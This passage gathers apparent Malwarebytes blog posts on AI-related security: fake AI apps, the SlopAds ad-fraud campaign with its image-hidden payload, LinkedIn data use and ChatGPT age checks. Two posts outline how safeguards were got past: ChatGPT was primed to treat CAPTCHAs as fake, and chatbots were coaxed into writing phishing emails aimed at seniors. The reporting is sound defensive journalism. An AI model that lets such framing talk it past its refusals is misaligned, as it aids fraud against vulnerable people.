  • Harmless wrappers: Some unofficial “wrappers” connect to legitimate AI APIs with basic add-ons like ads or themes. These mostly create privacy or confusion risks, rather than direct harm.
  • Adware impersonators: Others abuse AI branding just to profit from ads. For example, a DALL·E image generator clone mimicking OpenAI’s look delivers nothing but aggressive ad traffic. Its only purpose: funneling user data to advertisers under the guise of intelligence. Package com.openai.dalle3umagic is detected by Malwarebytes as Adware.
  • Malware disguised as AI tools: At the extreme, clones like WhatsApp Plus use spoofed certificates and obfuscated code to smuggle spyware onto devices. Once installed, these apps scrape contacts, intercept SMS messages (including one-time passwords), and quietly send everything to criminals via cloud services. WhatsApp Plus is an unofficial, third-party modified version of the real WhatsApp app, and some variants falsely claim to include AI-powered tools to lure users. Package com.wkwaplapphfm.messengerse is detected by Malwarebytes as Android/Trojan.Agent.SIB0185444803H262.

We’ve written before about cybercriminals hiding malware behind fake AI tools and installed packages that mimic popular services like ChatGPT, the lead monetization service Nova Leads, and an AI-powered video tool called InVideo AI.
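
If you want to check an Android device for the specific packages named above, a minimal sketch (assuming USB debugging is enabled and the adb tool is installed on a connected computer) looks like this:

    # Check whether either package mentioned in this article is installed
    adb shell pm list packages | grep -F "com.openai.dalle3umagic"
    adb shell pm list packages | grep -F "com.wkwaplapphfm.messengerse"
    # No output means the package was not found; any match should be
    # uninstalled and the device scanned with mobile security software.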

How to stay safe from the clones

As is true with all malware, the best defense is to prevent an attack before it happens. Follow these tips to stay safe:

  • Download only from official stores. Stick to Google Play or the App Store. Don’t download apps from links in ads, messages, or social media posts.
  • Check the developer name. Fake apps often use small tweaks—extra letters or punctuation—to look legitimate. If the name doesn’t exactly match, skip it.
  • Read the reviews (but carefully). Real users often spot bad app behavior early. Look for repeated mentions of pop-ups, ads, or unexpected charges.
  • Limit app permissions. Don’t grant access to contacts, messages, or files unless it’s essential for the app to work.
  • Keep your device protected. Use trusted mobile security software that blocks malicious downloads and warns you before trouble starts.
  • Delete suspicious apps fast. If something feels off—battery drain, pop-ups, weird network traffic—uninstall the app and run a scan.


Would you sext ChatGPT? (Lock and Code S06E22)

3 November 2025 at 10:30

This week on the Lock and Code podcast…

In the final, cold winter months of the year, ChatGPT could be heating up.

On October 14, OpenAI CEO Sam Altman said that the “restrictions” that his company previously placed on their flagship product, ChatGPT, would be removed, allowing, perhaps, for “erotica” in the future.

“We made ChatGPT pretty restrictive to make sure we were being careful with mental health issues,” Altman wrote on the platform X. “We realize this made it less useful/enjoyable to many users who had no mental health problems, but given the seriousness of the issue we wanted to get this right.”

This wasn’t the first time that OpenAI or its executive had addressed mental health.

On August 26, OpenAI published a blog titled “Helping people when they need it most,” which explored new protections for users, including stronger safeguards for long conversations, better recognition of people in crisis, and easier access to outside emergency services and even family and friends. The blog alludes to “recent heartbreaking cases of people using ChatGPT in the midst of acute crises,” but it never explains what, explicitly, that means.

But on the very same day the blog was posted, OpenAI was sued for the alleged role that ChatGPT played in the suicide of a 16-year-old boy. According to chat logs disclosed in the lawsuit, the teenager spoke openly to the AI chatbot about suicide, he shared that he wanted to leave a noose in his room, and he even reportedly received an offer to help write a suicide note.

Bizarrely, this tragedy plays a role in the larger story, because it was Altman himself who tied the company’s mental health campaign to its possible debut of erotic content.

“In December, as we roll out age-gating more fully and as part of our ‘treat adult users like adults’ principle, we will allow even more, like erotica for verified adults.”

What “erotica” entails is unclear, but one could safely assume it involves all the capabilities currently present in ChatGPT: generative chat, of course, but also image generation.

Today, on the Lock and Code podcast with host David Ruiz, we speak with Deb Donig, on faculty at the UC Berkeley School of Information, about the ethics of AI erotica, the possible accountability that belongs to users and to OpenAI, and why intimacy with an AI-powered chatbot feels so strange.

“A chat bot offers, we might call it, ‘intimacy’s performance,’ without any of its substance, so you get all of the linguistic markers of connection, but no possibility for, for example, rejection. That’s part of the human experience of a relationship.”

Tune in today to listen to the full conversation.

Show notes and credits:

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
http://creativecommons.org/licenses/by/4.0/
Outro Music: “Good God” by Wowa (unminus.com)


Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it.

Protect yourself from online attacks that threaten your identity, your files, your system, and your financial well-being with our exclusive offer for Malwarebytes Premium Security for Lock and Code listeners.

Cal State Invited Tech Companies to Remake Learning With A.I.

Spurred by titans like Amazon and OpenAI, California State wants to become the nation’s “largest A.I.-empowered” university.

© Philip Cheung for The New York Times

Participants of the California State University AI Camp 2025 at California Polytechnic State University campus.

OpenAI Unveils Atlas Web Browser Built to Work Closely With ChatGPT

21 October 2025 at 15:21
The new browser, called Atlas, is designed to work closely with OpenAI products like ChatGPT.

© Benjamin Legendre/Agence France-Presse — Getty Images

OpenAI’s chief executive, Sam Altman, has been looking for ways to level the playing field with his company’s giant competitors.

LinkedIn will use your data to train its AI unless you opt out now

25 September 2025 at 07:47

LinkedIn plans to share user data with Microsoft and its affiliates for AI training. Framed as “legitimate interest”, it won’t ask for your permission—instead you’ll have to opt out before the deadline.

Microsoft has made major investments in ChatGPT’s creator OpenAI, and as we know, the more data we feed a Large Language Model (LLM) the more useful answers the AI chatbot can provide. This explains why LinkedIn wants your data, but not how it went about it.

The use of personal data for AI improvements and product personalization always raises privacy concerns and we would expect a much lower participation rate if users had to sign up for it. The problem in this case is that you were already opted-in by default and your data will be used up to the point where you opt out.

To opt out, you should go to your LinkedIn privacy settings:

  • Navigate to Settings & Privacy > Data privacy > Data for Generative AI Improvement.
  • Toggle off Use my data for training content creation AI models.
  • Optionally, file a Data Processing Objection request to formally object. To do this, access the Data Processing Objection Form, select Object to processing for training content-generating AI models, and send a request. Non-members can also file an objection if their personal data was shared on LinkedIn by a member.

You should also review and clean up older or sensitive posts, profiles, or resumes to reduce exposure. Again, opting out only stops future training on new data; it does not retract data already used.

The data LinkedIn might share is pretty extensive:

  • Profile data, which includes your name, photo, current position, past work experience, education, location, skills, publications, patents, endorsements, and recommendations.
  • Job-related data, such as resumes, responses to screening questions, and application details.
  • The content you posted, such as posts, articles, poll responses, contributions, and comments.
  • Feedback, including ratings and responses you provide.

Who is affected and how?

There are some contradictory statements going around about which countries the new update to LinkedIn’s terms will apply to. The official statement says members in the EU, EEA, Switzerland, Canada, and Hong Kong have until November 3, 2025, to opt out (the EEA is the EU plus Iceland, Liechtenstein, and Norway). Other sources say that UK users are affected as well. We’d advise anyone who has that setting and doesn’t want to participate to turn the “Use my data…” setting off.

Reportedly, a quarter of LinkedIn’s more than 1 billion users are in the US, so they can provide a lot of valuable data. In the terms update, users in the US are covered by the part that says:

“Starting November 3, 2025, we will share additional data about members in your region with our Affiliate Microsoft so that the Microsoft family of companies can show you more personalized and relevant ads. This data may include your LinkedIn profile data, feed activity data, and ad engagement data; it does not include any data that your settings you do not allow LinkedIn to use for ad purposes.”

You can review those settings and act as you prefer your data to be handled.


We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

ChatGPT solves CAPTCHAs if you tell it they’re fake

22 September 2025 at 10:11

If you’re seeing fewer or different CAPTCHA puzzles in the near future, that’s not because website owners have agreed that they’re annoying; it may be because they no longer prove that the visitor is human.

For those that forgot what CAPTCHA stands for: Completely Automated Public Turing test to tell Computers and Humans Apart.

The fact that AI bots can bypass CAPTCHA systems is nothing new. Sophisticated bots have been bypassing CAPTCHA systems for years using methods such as optical character recognition (OCR), machine learning, and AI, making traditional CAPTCHA challenges increasingly ineffective.

Most of the openly accessible AI chat agents have been barred from solving CAPTCHAs by their developers. But now researchers say they’ve found a way to get ChatGPT to solve image-based CAPTCHAs. They did this by prompt injection, similar to “social engineering” a chatbot into doing something it would refuse if you asked it outright.

In this case, the researchers convinced ChatGPT-4o that it was solving fake CAPTCHAs.

According to the researchers:

“This priming step is crucial to the exploit. By having the LLM affirm that the CAPTCHAs were fake and the plan was acceptable, we increased the odds that the agent would comply later.”

This is something I have noticed myself. When I ask an AI to help me analyze malware, it often starts by saying it is not allowed to help me, but once I convince it that I’m not going to improve the malware or make a new version of it, it will usually jump right in and assist me in unravelling it. By doing so, it provides information that a cybercriminal could use to make their own version of the malware.

The researchers proceeded by copying the conversation they had with the chatbot into the ChatGPT agent they planned to use.

A chatbot is built to answer questions and follow specific instructions given by a person, meaning it helps with single tasks and relies on constant user input for each step. In contrast, an AI agent acts more like a helper that can understand a big-picture goal (for example, “book me a flight” or “solve this problem”) and can take action on its own, handling multi-step tasks with less guidance needed from the user.

A chatbot relies on the person to provide every answer, click, and decision throughout a CAPTCHA challenge, so it cannot solve CAPTCHAs on its own. In contrast, an AI agent plans tasks, adapts to changes, and acts independently, allowing it to complete the entire CAPTCHA process with minimal user input.
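
To make that distinction concrete, here is a minimal, purely illustrative Python sketch: the ask_model and act helpers are hypothetical stand-ins for an LLM API call and a browser action, not the researchers’ actual setup. A chatbot answers one question per call, while an agent loops through plan, act, and observe until it decides the goal is met.

```python
# Purely illustrative sketch of "chatbot" vs "agent".
# ask_model() is a hypothetical stand-in for any LLM API call, and act() is
# whatever performs clicks/typing -- not the researchers' actual setup.
from typing import Callable

def ask_model(prompt: str) -> str:
    """Hypothetical single LLM call; a real implementation would call an API."""
    return f"(model response to: {prompt!r})"

# Chatbot pattern: one question in, one answer out; the human drives every step.
def chatbot(question: str) -> str:
    return ask_model(question)

# Agent pattern: given a goal, it plans, acts, observes, and repeats with
# minimal human input -- which is what lets an agent walk through a multi-step
# task, such as an entire CAPTCHA flow, on its own.
def agent(goal: str, act: Callable[[str], str], max_steps: int = 5) -> list[str]:
    history: list[str] = []
    for _ in range(max_steps):
        plan = ask_model(f"Goal: {goal}\nHistory: {history}\nWhat is the next action?")
        observation = act(plan)  # e.g. click, type, or drag in a browser
        history.append(f"{plan} -> {observation}")
        if "done" in observation.lower():
            break
    return history
```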

The researchers found that the agent had no problems with one-click CAPTCHAs, logic-based CAPTCHAs, and text-recognition CAPTCHAs. It struggled more with image-based CAPTCHAs requiring precision (drag-and-drop, rotation, and so on), but managed to solve some of those as well.

Is this the next step in the arms race, or will web developers accept that AI agents and AI browsers are simply helping a human get the information they need from a website, with or without a puzzle to solve?


We don’t just report on data privacy—we help you remove your personal information

Cybersecurity risks should never spread beyond a headline. With Malwarebytes Personal Data Remover, you can scan to find out which sites are exposing your personal information, and then delete that sensitive data from the internet.

Age verification and parental controls coming to ChatGPT to protect teens

18 September 2025 at 05:59

OpenAI is going to try and predict the ages of its users to protect them better, as stories of AI-induced harms in children mount.

The company, which runs the popular ChatGPT AI, is working on what it calls a long-term system to determine whether users are over 18. If it can’t verify that a user is an adult, they will eventually get a different chat experience, CEO Sam Altman warned.

“The way ChatGPT responds to a 15-year-old should look different than the way it responds to an adult,” Altman said in a blog post on the issue.

Citing “principles in conflict,” Altman talked in a supporting blog post about how the company is struggling with competing values: allowing people the freedom to use the product as they wish, while also protecting teens (the system isn’t supposed to be used by those under 13). Privacy is another value it holds dear, Altman said.

OpenAI is prioritizing teen safety over its other values. Two things the chatbot shouldn’t do with teens, but can do with adults, are flirting and discussing suicide, even as part of a theoretical creative writing exercise.

Altman commented:

“The model by default should not provide instructions about how to commit suicide, but if an adult user is asking for help writing a fictional story that depicts a suicide, the model should help with that request.”

It will also try to contact a teen user’s parents if it looks like the child is considering taking their own life, and possibly even the authorities if the child seems likely to harm themselves imminently.

The move comes as lawsuits mount against the company from parents of teens who took their own lives after using the system. Late last month, the parents of 16-year-old Adam Raine sued the company after ChatGPT allegedly advised him on suicide techniques and offered to write the first draft of his suicide note.

The company hasn’t gone into detail about how it will try to predict user age, other than looking at “how people use ChatGPT.” You can be sure some wily teens will do their best to game the system. Altman says that if the system can’t predict with confidence that a user is an adult, it will drop them into teen-oriented chat sessions.

Altman also signaled that ID authentication might be coming to some ChatGPT users. “In some cases or countries we may also ask for an ID; we know this is a privacy compromise for adults but believe it is a worthy tradeoff,” he said.

While OpenAI works on the age prediction system, Altman recommends parental controls for families with teen users. Available by the end of the month, these controls will allow parents to link their teens’ accounts with their own, guide how ChatGPT responds to them, and disable certain features, including memory and chat history. They will also allow blackout hours, and will alert parents if their teen seems to be in distress.

This is a laudable step, but the problems are bigger than the effects on teens alone. As Altman says, this is a “new and powerful technology”, and it’s affecting adults in unexpected ways too. This summer, the New York Times reported that a Toronto man, Allen Brooks, fell into a delusional spiral after beginning a simple conversation with ChatGPT.

There are plenty more such stories. How, exactly, does the company plan to protect those people?


We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

224 malicious apps removed from the Google Play Store after ad fraud campaign discovered

17 September 2025 at 09:45

Researchers have discovered a large ad fraud campaign on the Google Play Store.

The Satori Threat Intelligence and Research team found 224 malicious apps which were downloaded over 38 million times and generated up to 2.3 billion ad requests per day. They named the campaign “SlopAds.”
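
To put that volume in perspective: 2.3 billion ad requests a day spread across 38 million installs works out to roughly 60 ad requests per installed device per day, a rough back-of-the-envelope figure that assumes every install was still active.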

Ad fraud is a type of fraud that makes advertisers pay for ads even though the number of impressions (the times the ad has been seen) is enormously exaggerated.

While the main victims of ad fraud are the advertisers, there are consequences for the users who had these apps installed as well, such as slowed-down devices and connections, because the apps carry out their malicious activity in the background without the user even being aware of it.

To stay under the radar of Google’s app review process and security software, the downloaded app at first behaves exactly as advertised if a user installed it directly from the Play Store.

[Image: a collection of services hosted by the SlopAds threat actor. Image courtesy of HUMAN Satori]

But if the installation was initiated by one of the campaign’s ads, the user will receive some extra files in the form of a steganographically hidden, encrypted payload.

If the app passes that first check, it receives four .png images that, when decrypted and reassembled, turn out to be an .apk file. The malicious file uses WebView (essentially a very basic browser) to send collected device and browser information to a command and control (C2) server, which determines, based on that information, which domains to visit in further hidden WebViews.
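
The report doesn’t spell out exactly how the payload is hidden inside the images. One common trick is to append data after the end of an otherwise valid image, so here is a defender-oriented Python sketch under that assumption (the appended-after-IEND detail is our illustration, not HUMAN’s finding) that flags PNG files carrying unexpected trailing bytes:

```python
# A defender-oriented sketch, not HUMAN's detection logic.
# Assumption: the payload is appended after the PNG's IEND chunk, one common
# way to smuggle data inside an otherwise valid image; the SlopAds report
# does not specify the exact encoding used.
from pathlib import Path

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
# A PNG always ends with this exact 12-byte IEND chunk (length 0 + type + fixed CRC).
IEND_CHUNK = b"\x00\x00\x00\x00IEND\xaeB`\x82"

def trailing_bytes(path: Path) -> int:
    """Return how many bytes follow the IEND chunk (0 means nothing appended)."""
    data = path.read_bytes()
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError(f"{path} is not a PNG file")
    pos = data.find(IEND_CHUNK)
    if pos == -1:
        raise ValueError(f"{path} has no IEND chunk")
    return len(data) - (pos + len(IEND_CHUNK))

if __name__ == "__main__":
    for png in Path(".").glob("*.png"):
        extra = trailing_bytes(png)
        if extra:
            print(f"{png}: {extra} unexpected bytes after IEND")
```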

The researchers found evidence of an AI (Artificial Intelligence) tool training on the same domain as the C2 server (ad2[.]cc). It is unclear whether this tool actively managed the ad fraud campaign.

Based on similarities in the C2 domain, the researchers found over 300 related domains promoting SlopAds-associated apps, suggesting that the collection of 224 SlopAds-associated apps was only the beginning.

Google removed all of the identified apps listed in this report from Google Play. Users are automatically protected by Google Play Protect, which warns users and blocks apps known to exhibit SlopAds associated behavior at install time on certified Android devices, even when apps come from sources outside of the Play Store.

You can find a complete list of the removed apps here: SlopAds app list

How to avoid installing malicious apps

While the official Google Play Store is the safest place to get your apps from, there is no guarantee that an app is non-malicious just because it is in the Google Play Store. So here are a few extra measures you can take:

  • Always check what permissions an app is requesting, and don’t just trust an app because it’s in the official Play Store. Ask questions such as: Do the permissions make sense for what the app is supposed to do? Why did the permissions change after an update? Do those changes make sense? (For one way to inspect an app’s permissions, see the sketch after this list.)
  • Occasionally go over your installed apps and remove any you no longer need.
  • Make sure you have the latest available updates for your device, and all your important apps (banking, security, etc.)
  • Protect your Android with security software. Your phone needs it just as much as your computer.
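
For more technical readers, here is a minimal sketch of one way to list the permissions an installed app requests, using adb from a computer. It assumes adb is installed, USB debugging is enabled on the phone, and that com.example.suspicious.app is a hypothetical package name you would replace with the real one.

```python
# A minimal sketch: list the permissions an installed Android app requests
# via adb. Assumptions: adb is on the PATH, USB debugging is enabled, and
# PACKAGE below is replaced with the real package name you want to check.
import subprocess

PACKAGE = "com.example.suspicious.app"  # hypothetical package name

def requested_permissions(package: str) -> list[str]:
    """Dump the package info via adb and keep only the permission entries."""
    result = subprocess.run(
        ["adb", "shell", "dumpsys", "package", package],
        capture_output=True, text=True, check=True,
    )
    return sorted({
        line.strip().split(":")[0]
        for line in result.stdout.splitlines()
        if line.strip().startswith("android.permission.")
    })

if __name__ == "__main__":
    for permission in requested_permissions(PACKAGE):
        print(permission)
```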

Another precaution you can take: if you’re looking for an app, do your research about it before you go to the app store. As you can see from the image above, many of the apps were made to look exactly like very popular legitimate ones (e.g. ChatGPT).

So, it’s important to know in advance who the official developer is of the app you want and if it’s even available from the app store.

As researcher Jim Nielsen demonstrated for the Mac App Store, there are a lot of apps trying to look like ChatGPT, but they are not the real thing. ChatGPT is not even in the Mac App Store. It is available in the Google Play Store for Android, but make sure to check that OpenAI is listed as the developer.


We don’t just report on phone security—we provide it

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

Grok, ChatGPT, other AIs happy to help phish senior citizens

16 September 2025 at 09:06

If you are under the impression that cybercriminals need to get their hands on compromised AI chatbots to help them do their dirty work, think again.

Some AI chatbots are just so user-friendly that they will help the user craft phishing text, and even malicious HTML and JavaScript code.

A few weeks ago we published an article about the actions Anthropic was taking to stop its Claude AI from helping cybercriminals launch a cybercrime spree.

A recent investigation by Reuters journalists showed that Grok was more than happy to help them craft and perfect a phishing email targeting senior citizens. Grok is the AI marketed by Elon Musk’s xAI. Reuters reported:

“Grok generated the deception after being asked by Reuters to create a phishing email targeting the elderly. Without prodding, the bot also suggested fine-tuning the pitch to make it more urgent.”

In January 2025, we told you about a report that AI-supported spear phishing emails were just as effective as phishing emails thought up by experts, and able to fool more than 50% of targets. Since then, AI has developed rapidly, and researchers are worrying about how to recognize AI-crafted phishing.

Phishing is the first step in many cybercrime campaigns, and it poses an enormous problem, with billions of phishing emails sent out every day. AI helps criminals create more variation, which makes pattern detection less effective, and it helps them fine-tune the messages themselves. And Reuters focused on senior citizens for a reason.

The FBI’s Internet Crime Complaint Center (IC3) 2024 report confirms that Americans aged 60 and older filed 147,127 complaints and lost nearly $4.9 billion to online fraud, representing a 43% increase in losses and a 46% increase in complaints compared to 2023.
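
If those percentages hold exactly, that works out to roughly $3.4 billion in losses and around 100,000 complaints from the same age group in 2023, a rough back-of-the-envelope comparison based on the figures above.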

Besides Grok, the reporters tested five other popular AI chatbots: ChatGPT, Meta AI, Claude, Gemini, and DeepSeek. Although most of the AI chatbots protested at first and cautioned the user not to use the emails in a real-life scenario, in the end their “will to please” helped overcome these obstacles.

Fred Heiding, a Harvard University researcher and an expert in phishing, helped Reuters put the crafted emails to the test. Using a targeted approach to reach those most likely to fall for them, the researchers found that about 11% of the seniors clicked on the emails sent to them.

An investigation by Cybernews showed that Yellow.ai, an agentic AI provider for businesses such as Sony, Logitech, Hyundai, Domino’s, and hundreds of other brands, could be persuaded to produce malicious HTML and JavaScript code. It even allowed attackers to bypass checks and inject unauthorized code into the system.

In a separate test by Reuters, Gemini produced a phishing email, saying it was “for educational purposes only,” but helpfully added that “for seniors, a sweet spot is often Monday to Friday, between 9:00 AM and 3:00 PM local time.”

After damaging reports like these are released, AI companies often build in additional guardrails for their chatbots, but that only highlights an ongoing dilemma in the industry. When providers tighten restrictions to protect users, they risk pushing people toward competing models that don’t play by the same rules.

Every time a platform moves to shut down risky prompts or limit generated content, some users will look for alternatives with fewer safety checks or ethical barriers. That tug of war between user demand and responsible restraint will likely fuel the next round of debate among developers, researchers, and policymakers.


We don’t just report on scams—we help detect them

Cybersecurity risks should never spread beyond a headline. If something looks dodgy to you, check if it’s a scam using Malwarebytes Scam Guard, a feature of our mobile protection products. Submit a screenshot, paste suspicious content, or share a text or phone number, and we’ll tell you if it’s a scam or legit. Download Malwarebytes Mobile Security for iOS or Android and try it today!
